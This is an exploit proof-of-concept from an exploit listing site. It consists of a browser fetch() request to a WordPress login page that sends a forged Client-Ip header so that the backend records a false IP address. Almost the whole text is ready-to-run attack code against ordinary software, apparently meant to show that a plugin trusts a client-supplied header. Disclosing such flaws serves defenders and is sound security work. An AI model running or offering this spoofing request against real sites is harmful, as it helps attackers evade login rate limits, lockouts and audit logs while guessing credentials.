## https://sploitus.com/exploit?id=WPEX-ID:F5EA6C8A-6B07-4263-A1BE-DD033F078D49
Run the following code in the web browser and note on the backend that the IP address has been faked.
await fetch("/wp-login.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
"Client-Ip": "8.8.8.8",
},
"body": "log=USERNAME&pwd=PASSWORD",
"method": "POST",
"mode": "cors",
"credentials": "include"
});